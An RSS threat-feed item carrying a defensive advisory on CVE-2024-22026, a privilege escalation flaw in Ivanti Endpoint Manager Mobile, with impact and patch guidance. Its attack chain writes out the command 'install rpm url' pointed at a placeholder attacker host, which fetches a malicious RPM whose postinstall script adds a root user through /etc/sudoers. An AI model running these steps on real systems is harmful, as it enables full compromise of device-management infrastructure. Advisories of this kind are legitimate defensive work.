<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:webfeeds="http://webfeeds.org/rss/1.0"><channel><title>Endpoint Manager Mobile (&lt; 12.1.0.0, &lt; 12.0.0.0, &lt; 11.12.0.1) - CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/products/endpoint-manager-mobile--12.1.0.0--12.0.0.0--11.12.0.1/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata. Fed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Fri, 02 Oct 2026 16:37:08 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/products/endpoint-manager-mobile--12.1.0.0--12.0.0.0--11.12.0.1/feed.xml" rel="self" type="application/rss+xml"/><image><url>https://feed.craftedsignal.io/favicon-32x32.png</url><title>CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/</link><width>32</width><height>32</height></image><webfeeds:icon>https://feed.craftedsignal.io/favicon.svg</webfeeds:icon><item><title>Local Privilege Escalation in Ivanti Endpoint Manager Mobile (CVE-2024-22026)</title><link>https://feed.craftedsignal.io/briefs/2026-10-ivanti-epmm-lpe/</link><pubDate>Fri, 02 Oct 2026 16:37:08 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-10-ivanti-epmm-lpe/</guid><description>A local privilege escalation vulnerability in Ivanti EPMM, tracked as CVE-2024-22026, allows an authenticated local attacker to achieve root access by installing unsigned RPM packages via the CLI 'install rpm url' command.</description><content:encoded><![CDATA[<p>CVE-2024-22026 is a local privilege escalation vulnerability affecting Ivanti Endpoint Manager Mobile (formerly MobileIron Core). The flaw resides in the CLI utility 'install rpm url', which fails to validate the authenticity or origin of RPM packages before installation. An attacker with existing low-privileged access to the system can point this utility to a remote, attacker-controlled repository containing a malicious RPM package. Upon execution, the utility invokes the native 'rpm' binary with root privileges to install the package. Because there is no signature verification or URL filtering, the system executes arbitrary scripts contained within the package's pre-install and post-install hooks, leading to full system compromise. The vulnerability is addressed in Ivanti EPMM versions 12.1.0.0, 12.0.0.0, and 11.12.0.1.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains initial access to the Ivanti EPMM system as a low-privileged user via compromised credentials or other entry vectors.</li>
<li>Attacker prepares a malicious RPM package using tools such as 'fpm', embedding custom scripts in 'preinstall.sh' and 'postinstall.sh'.</li>
<li>Attacker hosts the malicious RPM package on an external web server accessible by the target appliance.</li>
<li>Attacker executes the CLI command 'install rpm url http://&lt;attacker_IP&gt;/&lt;malicious&gt;.rpm' within the Ivanti console.</li>
<li>The application triggers the internal process to download the package from the provided URL.</li>
<li>The system executes '/bin/rpm -Uvh *.rpm' with root privileges to perform the installation.</li>
<li>The embedded 'postinstall.sh' script executes under the root context, creating a new user and modifying '/etc/sudoers' to grant persistent root access.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation results in full root-level compromise of the Ivanti EPMM appliance. Attackers can gain complete control over the device management infrastructure, potentially allowing them to bypass mobile security policies, exfiltrate sensitive configuration data, or push malicious profiles/applications to managed endpoints across the organization.</p>
<h2 id="recommendation">Recommendation</h2>
<ol>
<li>Upgrade all Ivanti Endpoint Manager Mobile instances to version 12.1.0.0, 12.0.0.0, or 11.12.0.1 immediately to patch CVE-2024-22026.</li>
<li>Implement strict network egress filtering on management appliances to prevent unauthorized outbound connections to untrusted external repositories or web servers.</li>
<li>Deploy the Sigma rules below to detect unauthorized usage of the 'install rpm' CLI command or execution of rpm installation processes by non-administrative users.</li>
<li>Review system audit logs for unauthorized user creation or modifications to the /etc/sudoers file.</li>
</ol>
]]></content:encoded><category domain="severity">low</category><category domain="type">advisory</category><category>privilege-escalation</category><category>vulnerability</category></item></channel></rss>